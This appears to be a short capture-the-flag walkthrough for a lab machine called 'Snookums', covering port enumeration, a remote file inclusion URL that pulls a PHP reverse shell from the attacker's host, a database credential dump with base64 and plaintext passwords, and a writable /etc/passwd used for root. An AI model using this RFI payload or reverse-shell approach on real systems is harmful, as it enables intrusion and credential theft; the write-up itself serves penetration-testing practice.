🐧Snookums

IP: 192.168.116.58

Enumeration

Nmap scan

rustscan -a 192.168.116.58 -- -A

Port 21

FTP does allow anonymous login but I found nothing here.

Port 80

Dirbuster scan

This page is vulnerable to remote file inclusion.

http://192.168.116.58/image.php?img=http://192.168.49.116/PHP/phprevshell.php

Had to use an already open port for reverse shell.

Port 111

Port 139,445

This does allow anonymous login.

Shell

db.php

Had to spawn a bash reverse shell back to another listener for this to let me log into the database. Spent a long time in a hole trying to figure out why I couldn't log into MySQL.

 josh      | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= | MobilizeHissSeedtime747
 michael   | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== | HockSydneyCertify123
 serena    | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== | OverallCrestLean000

Linpeas found that /etc/passwd was writable by michael.

Root

PreviousWalla NextExfiltrated

Last updated 2 years ago

Was this helpful?